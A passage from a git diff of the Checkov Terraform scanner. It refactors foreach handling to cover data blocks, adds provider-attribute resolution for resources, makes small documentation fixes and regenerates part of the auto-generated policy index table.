{}) + + self._update_foreach_attrs(config_attrs, key_to_val_changes, new_resource) + idx_to_change = new_key or new_value + self._add_index_to_resource_block_properties(new_resource, idx_to_change) + if foreach_idx == 0: + self.local_graph.vertices[resource_idx] = new_resource + else: + self.local_graph.vertices.append(new_resource) + + @staticmethod + def _add_index_to_resource_block_properties(block: TerraformBlock, idx: str | int) -> None: + block_type, block_name = block.name.split('.') + idx_with_separator = ForeachEntityHandler._update_block_name_and_id(block, idx) + if block.config.get(block_type) and block.config.get(block_type, {}).get(block_name): + block.config[block_type][f"{block_name}[{idx_with_separator}]"] = block.config[block_type].pop(block_name) + + def _create_new_resources(self, block_index_to_statement: FOR_EACH_BLOCK_TYPE) -> None: + for block_idx, statement in block_index_to_statement.items(): + if not statement: + continue + if isinstance(statement, int): + self._create_new_resources_count(statement, block_idx) + else: + self._create_new_resources_foreach(statement, block_idx) diff --git a/checkov/terraform/graph_builder/foreach/module_handler.py b/checkov/terraform/graph_builder/foreach/module_handler.py index 529d893e4e1..b84d8bc3493 100644 --- a/checkov/terraform/graph_builder/foreach/module_handler.py +++ b/checkov/terraform/graph_builder/foreach/module_handler.py @@ -35,6 +35,8 @@ def handle(self, modules_blocks: list[int]) -> None: while modules_to_render: modules_to_render = self._render_foreach_modules_by_levels(modules_blocks, modules_to_render, current_level) + self.local_graph._arrange_graph_data() + self.local_graph._build_edges() def _render_foreach_modules_by_levels(self, modules_blocks: list[int], modules_to_render: list[int], current_level: list[TFModule | None]) -> list[int]: @@ -75,8 +77,16 @@ def _duplicate_module_with_for_each(self, module_idx: int, for_each: dict[str, A def _duplicate_module_with_count(self, module_idx: int, count: int) -> None: self._create_new_resources_count(count, module_idx) + def _get_rendered_modules(self, source_modules: list[TFModule | None]) -> list[int]: + """ + Returns a list of module indexes that have been rendered in the current iteration. + """ + modules_created_by_provided_source_packed = [self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE] for curr in source_modules] + modules_created_by_provided_source = list(itertools.chain(*modules_created_by_provided_source_packed)) # list of lists -> single list + return modules_created_by_provided_source + def _get_modules_to_render(self, current_level: list[TFModule | None]) -> list[int]: - rendered_modules = [self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE] for curr in current_level][0] + rendered_modules = self._get_rendered_modules(current_level) current_level.clear() for m_idx in rendered_modules: current_level.append(self._get_current_tf_module_object(m_idx)) @@ -190,7 +200,7 @@ def _create_new_module( main_resource_module_key = TFModule( path=new_resource.path, name=main_resource.name, - nested_tf_module=self._get_tf_module_with_no_foreach(new_resource.source_module_object) + nested_tf_module=new_resource.source_module_object ) # Without making this copy the test don't pass, as we might access the data structure in the middle of an update diff --git a/checkov/terraform/graph_builder/foreach/resource_handler.py b/checkov/terraform/graph_builder/foreach/resource_handler.py index 8540d8d12b1..e08101f5634 100644 --- a/checkov/terraform/graph_builder/foreach/resource_handler.py +++ b/checkov/terraform/graph_builder/foreach/resource_handler.py @@ -1,110 +1,15 @@ from __future__ import annotations -import logging -import typing -from typing import Any, Optional - -from checkov.common.util.data_structures_utils import pickle_deepcopy from checkov.terraform.graph_builder.graph_components.block_types import BlockType -from checkov.terraform.graph_builder.foreach.abstract_handler import ForeachAbstractHandler -from checkov.terraform.graph_builder.foreach.consts import FOREACH_STRING, COUNT_STRING, FOR_EACH_BLOCK_TYPE -from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock - -if typing.TYPE_CHECKING: - from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph - - -class ForeachResourceHandler(ForeachAbstractHandler): - def __init__(self, local_graph: TerraformLocalGraph) -> None: - super().__init__(local_graph) - - def handle(self, resources_blocks: list[int]) -> None: - block_index_to_statement: FOR_EACH_BLOCK_TYPE = self._get_statements(resources_blocks) - self._create_new_resources(block_index_to_statement) +from checkov.terraform.graph_builder.foreach.foreach_entity_handler import ForeachEntityHandler - def _get_statements(self, resources_blocks: list[int]) -> FOR_EACH_BLOCK_TYPE: - if not resources_blocks: - return {} - block_index_to_statement: FOR_EACH_BLOCK_TYPE = {} - for block_index, block in enumerate(self.local_graph.vertices): - if block.block_type != BlockType.RESOURCE or not (FOREACH_STRING in block.attributes or COUNT_STRING in block.attributes): - continue - foreach_statement = self._get_static_foreach_statement(block_index) - block_index_to_statement[block_index] = foreach_statement - blocks_to_render = [block_idx for block_idx, statement in block_index_to_statement.items() if statement is None] - if blocks_to_render: - rendered_statements: FOR_EACH_BLOCK_TYPE = self._handle_dynamic_statement(blocks_to_render) - block_index_to_statement.update(rendered_statements) - return block_index_to_statement +from typing import TYPE_CHECKING - def _get_static_foreach_statement(self, block_index: int) -> Optional[list[str] | dict[str, Any] | int]: - attributes = self.local_graph.vertices[block_index].attributes - if not attributes.get(FOREACH_STRING) and not attributes.get(COUNT_STRING): - return None - try: - if self._is_static_statement(block_index): - return self._handle_static_statement(block_index) - else: - return None - except Exception as e: - logging.info( - f"Cant get foreach statement for block: {self.local_graph.vertices[block_index]}, error: {str(e)}") - return None - - def _handle_dynamic_statement(self, blocks_to_render: list[int]) -> FOR_EACH_BLOCK_TYPE: - rendered_statements_by_idx: FOR_EACH_BLOCK_TYPE = {} - sub_graph = self._build_sub_graph(blocks_to_render) - self._render_sub_graph(sub_graph, blocks_to_render) - for block_idx in blocks_to_render: - if not self._is_static_statement(block_idx, sub_graph): - rendered_statements_by_idx[block_idx] = None - else: - rendered_statements_by_idx[block_idx] = self._handle_static_statement(block_idx, sub_graph) - return rendered_statements_by_idx - - def _create_new_resources_count(self, statement: int, block_idx: int) -> None: - main_resource = self.local_graph.vertices[block_idx] - for i in range(statement): - self._create_new_resource(main_resource, i, resource_idx=block_idx, foreach_idx=i) - - def _create_new_resource( - self, - main_resource: TerraformBlock, - new_value: int | str, - resource_idx: int, - foreach_idx: int, - new_key: int | str | None = None, - ) -> None: - new_resource = pickle_deepcopy(main_resource) - block_type, block_name = new_resource.name.split('.') - key_to_val_changes = self._build_key_to_val_changes(main_resource, new_value, new_key) - config_attrs = new_resource.config.get(block_type, {}).get(block_name, {}) - - self._update_foreach_attrs(config_attrs, key_to_val_changes, new_resource) - idx_to_change = new_key or new_value - self._add_index_to_resource_block_properties(new_resource, idx_to_change) - if foreach_idx == 0: - self.local_graph.vertices[resource_idx] = new_resource - else: - self.local_graph.vertices.append(new_resource) +if TYPE_CHECKING: + from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph - def _create_new_foreach_resource(self, block_idx: int, foreach_idx: int, main_resource: TerraformBlock, - new_key: int | str, new_value: int | str) -> None: - self._create_new_resource(main_resource, new_value, new_key=new_key, resource_idx=block_idx, - foreach_idx=foreach_idx) - @staticmethod - def _add_index_to_resource_block_properties(block: TerraformBlock, idx: str | int) -> None: - block_type, block_name = block.name.split('.') - idx_with_separator = ForeachResourceHandler._update_block_name_and_id(block, idx) - if block.config.get(block_type) and block.config.get(block_type, {}).get(block_name): - block.config[block_type][f"{block_name}[{idx_with_separator}]"] = block.config[block_type].pop(block_name) +class ForeachResourceHandler(ForeachEntityHandler): - def _create_new_resources(self, block_index_to_statement: FOR_EACH_BLOCK_TYPE) -> None: - for block_idx, statement in block_index_to_statement.items(): - if not statement: - continue - if isinstance(statement, int): - self._create_new_resources_count(statement, block_idx) - else: - self._create_new_resources_foreach(statement, block_idx) + def __init__(self, local_graph: TerraformLocalGraph) -> None: + super().__init__(local_graph, BlockType.RESOURCE) diff --git a/checkov/terraform/graph_builder/graph_components/module.py b/checkov/terraform/graph_builder/graph_components/module.py index 8b67f9cb1e4..76231fb7ece 100644 --- a/checkov/terraform/graph_builder/graph_components/module.py +++ b/checkov/terraform/graph_builder/graph_components/module.py @@ -7,6 +7,7 @@ from checkov.common.typing import TFDefinitionKeyType from checkov.common.util.data_structures_utils import pickle_deepcopy +from checkov.terraform import TFDefinitionKey from checkov.terraform.graph_builder.graph_components.block_types import BlockType from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock from checkov.terraform.parser_functions import handle_dynamic_values @@ -34,6 +35,7 @@ def __init__( self.resources_types: Set[str] = set() self.source_dir = source_dir self.render_dynamic_blocks_env_var = os.getenv('CHECKOV_RENDER_DYNAMIC_MODULES', 'True') + self.temp_tf_definition: dict[TFDefinitionKey, dict[str, Any]] = {} def __eq__(self, other: object) -> bool: if not isinstance(other, Module): diff --git a/checkov/terraform/graph_builder/local_graph.py b/checkov/terraform/graph_builder/local_graph.py index 877fb876f94..a9560feb947 100644 --- a/checkov/terraform/graph_builder/local_graph.py +++ b/checkov/terraform/graph_builder/local_graph.py @@ -6,7 +6,7 @@ from collections import defaultdict from functools import partial from pathlib import Path -from typing import List, Optional, Union, Any, Dict, overload, TypedDict +from typing import List, Optional, Union, Any, Dict, overload, TypedDict, cast import checkov.terraform.graph_builder.foreach.consts from checkov.common.graph.graph_builder import Edge @@ -15,6 +15,7 @@ from checkov.common.graph.graph_builder.local_graph import LocalGraph from checkov.common.graph.graph_builder.utils import calculate_hash, join_trimmed_strings, filter_sub_keys from checkov.common.runners.base_runner import strtobool +from checkov.common.typing import TFDefinitionKeyType from checkov.common.util.data_structures_utils import pickle_deepcopy from checkov.common.util.type_forcers import force_int from checkov.terraform.graph_builder.foreach.builder import ForeachBuilder @@ -31,9 +32,11 @@ attribute_has_nested_attributes, remove_index_pattern_from_str, join_double_quote_surrounded_dot_split, ) -from checkov.terraform.graph_builder.foreach.utils import get_terraform_foreach_or_count_key +from checkov.terraform.graph_builder.foreach.utils import get_terraform_foreach_or_count_key, \ + get_sanitized_terraform_resource_id from checkov.terraform.graph_builder.utils import is_local_path -from checkov.terraform.graph_builder.variable_rendering.renderer import TerraformVariableRenderer +from checkov.terraform.graph_builder.variable_rendering.renderer import TerraformVariableRenderer, \ + LEFT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET_WITH_QUOTATION, LEFT_BRACKET, RIGHT_BRACKET, DOLLAR_PREFIX, RIGHT_CURLY, LEFT_CURLY from checkov.common.util.consts import RESOLVED_MODULE_ENTRY_NAME MODULE_RESERVED_ATTRIBUTES = ("source", "version") @@ -66,7 +69,8 @@ def __init__(self, module: Module) -> None: self.vertices_by_module_dependency: Dict[TFModule | None, Dict[str, List[int]]] = defaultdict(partial(defaultdict, list)) self.enable_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_FOREACH_HANDLING', 'True')) self.enable_modules_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_MODULES_FOREACH_HANDLING', 'True')) - self.foreach_blocks: Dict[str, List[int]] = {BlockType.RESOURCE: [], BlockType.MODULE: []} + self.enable_datas_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False')) + self.foreach_blocks: Dict[str, List[int]] = {BlockType.RESOURCE: [], BlockType.MODULE: [], BlockType.DATA: []} # Important for foreach performance, see issue https://github.com/bridgecrewio/checkov/issues/6068 self._vertex_path_to_realpath_cache: Dict[str, str] = {} @@ -77,7 +81,7 @@ def build_graph(self, render_variables: bool) -> None: self._build_edges() logging.info(f"[TerraformLocalGraph] created {len(self.edges)} edges") if (self.enable_foreach_handling or self.enable_modules_foreach_handling) \ - and (self.foreach_blocks[BlockType.RESOURCE] or self.foreach_blocks[BlockType.MODULE]): + and (self.foreach_blocks[BlockType.RESOURCE] or self.foreach_blocks[BlockType.MODULE] or self.foreach_blocks[BlockType.DATA]): try: logging.info('[TerraformLocalGraph] start handling foreach') foreach_builder = ForeachBuilder(self) @@ -113,6 +117,10 @@ def update_vertices_fields(self) -> None: # Important to keep those 2 functions together, as the first affects the calculation of the second self._update_vertices_breadcrumbs_and_module_connections() self._update_nested_modules_address() + try: + self._add_provider_attr_to_resources() + except Exception as e: + logging.info(f'Failed to add provider attributes to resources, error: {str(e)}') def _create_vertices(self) -> None: logging.info("Creating vertices") @@ -122,7 +130,7 @@ def _create_vertices(self) -> None: self._add_block_data_to_graph(i, block) if self.enable_foreach_handling and ( checkov.terraform.graph_builder.foreach.consts.FOREACH_STRING in block.attributes or checkov.terraform.graph_builder.foreach.consts.COUNT_STRING in block.attributes) \ - and block.block_type in (BlockType.MODULE, BlockType.RESOURCE): + and block.block_type in (BlockType.MODULE, BlockType.RESOURCE, BlockType.DATA): self.foreach_blocks[block.block_type].append(i) def _add_block_data_to_graph(self, idx: int, block: TerraformBlock) -> None: @@ -139,6 +147,102 @@ def _add_block_data_to_graph(self, idx: int, block: TerraformBlock) -> None: self.in_edges[idx] = [] self.out_edges[idx] = [] + def _add_provider_attr_to_resources(self) -> None: + """ + Assign provider attributes to resource vertices in the Terraform configuration. + + This function iterates through all vertices, and for each vertex that is of the + `RESOURCE` block type, it attempts to determine and assign the appropriate + provider based on the vertex's attributes and the module's temporary Terraform + definitions. + + The function performs the following steps: + 1. Iterates over each vertex in `self.vertices`. + 2. Checks if the vertex's `block_type` is `RESOURCE`. + 3. Determines the path for the Terraform definition. + 4. Checks for the presence of a provider in the vertex's attributes. + 5. If no provider is found, checks in the module's temporary Terraform definition. + 6. If still no provider is found, iterates through nested modules to find a provider. + 7. Assigns the provider fields to the vertex once a provider is determined. + """ + for vertex in self.vertices: + if vertex.block_type == BlockType.RESOURCE: + path_for_tf_definition = TFDefinitionKey(file_path=vertex.path, tf_source_modules=vertex.source_module_object) + if BlockType.PROVIDER in vertex.attributes: + provider = self._get_the_default_provider(vertex.attributes[BlockType.PROVIDER], path_for_tf_definition) + self._assign_provider_fields(vertex, provider) + elif BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, {}): + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(path_for_tf_definition, {}).get(BlockType.PROVIDER, []), path_for_tf_definition, is_same_file=True) + v_name = vertex.name.split('.') + provider_name = vertex.config[v_name[0]][v_name[1]][CustomAttributes.TF_RESOURCE_ADDRESS].replace(vertex.name, provider_name) + self._assign_provider_fields(vertex, provider_name) + else: + while path_for_tf_definition.tf_source_modules: + if self.module.temp_tf_definition and path_for_tf_definition.tf_source_modules and BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, ''): + module = [m for m in self.module.temp_tf_definition.get(path_for_tf_definition).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + break + elif path_for_tf_definition.tf_source_modules and BlockType.PROVIDER in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}): + if vertex.source_module_object and vertex.source_module_object.nested_tf_module: + module = [m for m in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.nested_tf_module.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + else: + module = [m for m in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + break + else: + path_for_tf_definition = TFDefinitionKey(tf_source_modules=path_for_tf_definition.tf_source_modules.nested_tf_module, file_path=path_for_tf_definition.tf_source_modules.path) + + @staticmethod + def _assign_provider_fields(vertex: TerraformBlock, provider_name: str) -> None: + vertex.attributes[CustomAttributes.PROVIDER_ADDRESS] = provider_name + v_name = vertex.name.split('.') + vertex.config[v_name[0]][v_name[1]][CustomAttributes.PROVIDER_ADDRESS] = provider_name + + def _get_provider_address(self, path_for_tf_definition: TFDefinitionKeyType) -> list[int] | None: + if isinstance(path_for_tf_definition, TFDefinitionKey): + return self.vertices_by_module_dependency[path_for_tf_definition.tf_source_modules].get(BlockType.PROVIDER) + return None + + def _get_the_default_provider( + self, + providers: list[dict[str, dict[str, Any]] | str], + path_for_tf_definition: TFDefinitionKeyType, + module: Optional[list[dict[str, Any]]] = None, + is_same_file: bool = False + ) -> str: + provider_address = self._get_provider_address(path_for_tf_definition) + if module and len(module) > 0: + module_providers = module[0][list(module[0].keys())[0]].get('providers', [''])[0] + if module_providers: + for _, m_alias in module_providers.items(): + if not provider_address: + return cast(str, module_providers[list(module_providers.keys())[0]].replace(DOLLAR_PREFIX, "").replace(LEFT_CURLY, "").replace(RIGHT_CURLY, "")) + else: + for p_address in provider_address: + if m_alias.replace(DOLLAR_PREFIX, "").replace(LEFT_CURLY, "").replace(RIGHT_CURLY, "") == self.vertices[p_address].name: + return cast(str, self.vertices[p_address].config[list(self.vertices[p_address].config)[0]].get(CustomAttributes.TF_RESOURCE_ADDRESS)) + + if isinstance(providers[0], str): + for provider in providers: + if provider_address: + for address in provider_address: + if self.vertices[address].name == provider: + return cast(str, self.vertices[address].config[list(self.vertices[address].config)[0]].get(CustomAttributes.TF_RESOURCE_ADDRESS)) + else: + for provider in providers: + provider_name = list(provider.keys())[0] # type:ignore + if 'alias' not in provider[provider_name]: + if provider_address and not is_same_file: + for p_address in provider_address: + if self.vertices[p_address].name == provider_name: + return cast(str, self.vertices[p_address].config[list(self.vertices[p_address].config.keys())[0]][CustomAttributes.TF_RESOURCE_ADDRESS]) + return f'{provider_name}.default' + return '' + def _arrange_graph_data(self) -> None: # reset all the relevant data self.vertices_by_block_type = defaultdict(list) @@ -209,7 +313,7 @@ def _build_edges_for_vertex(self, origin_node_index: int, vertex: TerraformBlock resources_types=resources_types, ) for vertex_reference in referenced_vertices: - # for certain blocks such as data and resource, the block name is composed from several parts. + # for certain blocks such as data and resource, the block name is composed of several parts. # the purpose of the loop is to avoid not finding the node if the name has several parts sub_values = [remove_index_pattern_from_str(sub_value) for sub_value in vertex_reference.sub_parts] for i in range(len(sub_values)): @@ -302,6 +406,8 @@ def _get_target_variables(self, vertex: TerraformBlock, dest_module_path: str) - def _connect_module_provider(self) -> None: for origin_node_index, referenced_vertices in self.out_edges.items(): + if not referenced_vertices: + continue vertex = self.vertices[origin_node_index] # if we have an edge of module->provider we need to connect that modules' resources to the provider if vertex.block_type == BlockType.MODULE: @@ -320,7 +426,6 @@ def _connect_module_provider(self) -> None: for e in referenced_vertices: if self.vertices[e.dest].block_type == BlockType.PROVIDER: for resource in resources: - # connect resource to provider self.create_edge(resource, e.dest, e.label) except Exception as e: logging.warning(f"Failed in connecting module resources to provider due to {e}") @@ -452,7 +557,7 @@ def _find_vertex_index_relative_to_path( module_dependency_by_name_key = vertex.source_module_object # important to use this specific map for big graph performance - possible_vertices = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name, []) + possible_vertices = self._get_possible_vertices(module_dependency_by_name_key, block_type, name) for vertex_index in possible_vertices: vertex = self.vertices[vertex_index] if self.get_dirname(vertex.path) == self.get_dirname(block_path): @@ -464,6 +569,12 @@ def _find_vertex_index_relative_to_path( relative_vertex = self._find_vertex_with_best_match(relative_vertices, block_path, origin_vertex_index) return relative_vertex + def _get_possible_vertices(self, module_dependency_by_name_key: TFModule | None, block_type: str, name: str) -> list[int]: + possible_vertices = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name, []) + if possible_vertices: + return possible_vertices + return self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET), []) + def _find_vertex_with_best_match(self, relevant_vertices_indexes: List[int], origin_path: str, origin_vertex_index: Optional[int] = None) -> int: vertex_index_with_longest_common_prefix = -1 @@ -799,4 +910,5 @@ def update_list_attribute( def get_vertex_as_tf_module(block: TerraformBlock) -> TFModule: - return TFModule(block.path, block.name, block.source_module_object) + block_name = get_sanitized_terraform_resource_id(block.name) + return TFModule(path=block.path, name=block_name, nested_tf_module=block.source_module_object, foreach_idx=block.for_each_index) diff --git a/checkov/terraform/graph_builder/utils.py b/checkov/terraform/graph_builder/utils.py index 66918d964b5..c4f3b7318b6 100644 --- a/checkov/terraform/graph_builder/utils.py +++ b/checkov/terraform/graph_builder/utils.py @@ -173,6 +173,11 @@ def remove_index_pattern_from_str(str_value: str) -> str: # otherwise it can't be accessed via index return str_value + # Workaround for cases where the string value contains a map attribute access for foreach data block + # UT for this - `test_foreach_data_with_resource` -> /variable_rendering/test_foreach_renderer.py + if "data." in str_value: + return str_value + str_value = re.sub(INDEX_PATTERN, "", str_value) str_value = str_value.replace('["', CHECKOV_LOREM_IPSUM_VAL).replace("[", " [ ").replace(CHECKOV_LOREM_IPSUM_VAL, '["') str_value = str_value.replace('"]', CHECKOV_LOREM_IPSUM_VAL).replace("]", " ] ").replace(CHECKOV_LOREM_IPSUM_VAL, '"]') @@ -258,7 +263,6 @@ def get_referenced_vertices_in_str_value( str_value = remove_function_calls_from_str(str_value=str_value) str_value = remove_index_pattern_from_str(str_value=str_value) - str_value = replace_map_attribute_access_with_dot(str_value=str_value) str_value = remove_interpolation(str_value=str_value) references_vertices = get_vertices_references(str_value, aliases, resources_types) diff --git a/checkov/terraform/graph_builder/variable_rendering/renderer.py b/checkov/terraform/graph_builder/variable_rendering/renderer.py index 0215e1901e9..18326591a1e 100644 --- a/checkov/terraform/graph_builder/variable_rendering/renderer.py +++ b/checkov/terraform/graph_builder/variable_rendering/renderer.py @@ -236,6 +236,8 @@ def find_path_from_referenced_vertices( name = ".".join(copy_of_attribute_path[: i + 1]) if vertex_attributes[CustomAttributes.BLOCK_NAME] == name: return attribute_path, vertex_reference.origin_value + elif vertex_attributes[CustomAttributes.BLOCK_NAME] == name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET): + return attribute_path, vertex_reference.origin_value elif block_type == BlockType.MODULE: copy_of_attribute_path.reverse() for i, _ in enumerate(copy_of_attribute_path): @@ -363,6 +365,9 @@ def _process_dynamic_blocks(dynamic_blocks: list[dict[str, Any]] | dict[str, Any dynamic_arguments: list[str] = [] TerraformVariableRenderer._extract_dynamic_arguments(block_name, block_content, dynamic_arguments, []) + if not dynamic_arguments and len(dynamic_values) == 1: + for argument, _ in block_content.items(): + dynamic_arguments.append(argument) if dynamic_arguments and isinstance(dynamic_values, list): block_confs = [] for dynamic_value in dynamic_values: diff --git a/checkov/terraform/tf_parser.py b/checkov/terraform/tf_parser.py index 9be746d5950..2f8893286c4 100644 --- a/checkov/terraform/tf_parser.py +++ b/checkov/terraform/tf_parser.py @@ -48,6 +48,7 @@ def __init__(self, module_class: type[Module] = Module) -> None: self.module_address_map: Dict[Tuple[str, str], str] = {} self.loaded_files_map: dict[str, dict[str, list[dict[str, Any]]] | None] = {} self.external_variables_data: list[tuple[str, Any, str]] = [] + self.temp_tf_definition: dict[str, Any] = {} def _init(self, directory: str, out_evaluations_context: Dict[TFDefinitionKey, Dict[str, EvaluationContext]] | None, @@ -461,6 +462,7 @@ def parse_hcl_module_from_tf_definitions( ) self.add_tfvars(module, source) copy_of_tf_definitions = pickle_deepcopy(tf_definitions) + module.temp_tf_definition = tf_definitions # type:ignore # will be TFDefinitionKey and not string for file_path, blocks in copy_of_tf_definitions.items(): for block_type in blocks: try: @@ -699,13 +701,15 @@ def load_or_die_quietly( file: str | Path | os.DirEntry[str], parsing_errors: dict[str, Exception], clean_definitions: bool = True ) -> Optional[_Hcl2Payload]: """ -Load JSON or HCL, depending on filename. + Load JSON or HCL, depending on filename. :return: None if the file can't be loaded """ - file_path = os.fspath(file) file_name = os.path.basename(file_path) + if file_name.endswith('.tfvars'): + clean_definitions = False + try: logging.debug(f"Parsing {file_path}") diff --git a/checkov/version.py b/checkov/version.py index e51c2d88da4..a6c7e795449 100644 --- a/checkov/version.py +++ b/checkov/version.py @@ -1 +1 @@ -version = '3.2.79' +version = '3.2.125' diff --git a/docs/2.Basics/CLI Command Reference.md b/docs/2.Basics/CLI Command Reference.md index 6120d3ab08a..728abeb48e0 100644 --- a/docs/2.Basics/CLI Command Reference.md +++ b/docs/2.Basics/CLI Command Reference.md @@ -55,10 +55,11 @@ nav_order: 2 | `--output-baseline-as-skipped` | Output checks that are skipped due to baseline file presence | | `--skip-cve-package SKIP_CVE_PACKAGE` | Filter scan to run on all packages but a specific package identifier (deny list), You can specify this argument multiple times to skip multiple packages | | `--policy-metadata-filter POLICY_METADATA_FILTER` | Comma separated key:value string to filter policies based on Prisma Cloud policy metadata. See https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options for information on allowed filters. Format: policy.label=test,cloud.type=aws | -| `--summary-position` {`top`, `bottom`} | Chose whether the summary will be appended on top (before the checks results) or on bottom (after check results), default is on top. | +| `--summary-position` {`top`, `bottom`} | Choose whether the summary will be appended on top (before the checks results) or on bottom (after check results), default is on top. | | `--no-fail-on-crash ` | Return exit code 0 instead of 2 which indicates a failure in the integration with the platform | | `--enable-secret-scan-all-files CKV_SECRETS_SCAN_ENABLE_ALL` | Enable secret scan to scan all type of file | | `--scan-secrets-history` | Enable secret scan history of commits | | `--block-list-secret-scan CKV_SECRETS_SCAN_BLOCK_LIST` | List of files to filter out in the secret scanner | | `--support` | Enable debug logs and upload the logs to the server. Requires a Prisma Cloud API key. | | `--openai-api-key` | Add an OpenAI API key to enhance finding guidelines by sending violated policies and resource code to OpenAI to request remediation guidance. This will use your OpenAI credits. Set your number of findings that will receive enhanced guidelines using CKV_OPENAI_MAX_FINDINGS | +| env variable: `RENDER_EDGES_DUPLICATE_ITER_COUNT` | Set the threshold to break out of calculating duplicate edges in the graph. This can be determined if you see `Reached too many edge duplications...` in the Checkov logs. Default: `4`. | diff --git a/docs/5.Policy Index/all.md b/docs/5.Policy Index/all.md index 726323eb244..6e05eae28fa 100644 --- a/docs/5.Policy Index/all.md +++ b/docs/5.Policy Index/all.md @@ -6,3709 +6,3779 @@ nav_order: 1 # all resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|------|--------------------------|----------------------------------|--------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | -| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | -| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | -| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | -| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | -| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | -| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | -| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | -| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | -| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | 